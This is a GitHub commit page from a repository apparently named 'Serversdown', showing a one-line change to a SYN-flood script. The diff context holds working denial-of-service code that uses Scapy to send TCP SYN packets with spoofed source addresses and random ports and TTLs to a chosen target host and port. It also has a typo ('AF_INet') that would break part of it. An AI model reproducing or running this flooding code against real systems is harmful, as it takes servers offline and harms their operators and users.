Skip to content

Commit

Permalink
Version 0.8 coming soon
Browse files Browse the repository at this point in the history
  • Loading branch information
Hacker5preme committed Sep 29, 2019
1 parent a935b0b commit 20f44ee
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion Serversdown/definepacket_synflood.py
Original file line number Diff line number Diff line change
Expand Up @@ -13,7 +13,7 @@ def sendpacket(Ip_range, destination, targetport):
silva.send(bytes(IP(dst = str(destination), src = str(Ip_range), ttl=int(random.randint(80, 254)))/TCP(dport = int(targetport), sport = int(random.randint(1024, 65535)), flags = "S")))
print 'Package sent'
except:
silva.shutdown()
silva.shutdown(socket.SHUT_RDWR)
silva.close()
silva = socket.socket(socket.AF_INet, socket.SOCK_STREAM)
silva.connect((destination, targetport))
Expand Down

0 comments on commit 20f44ee

Please sign in to comment.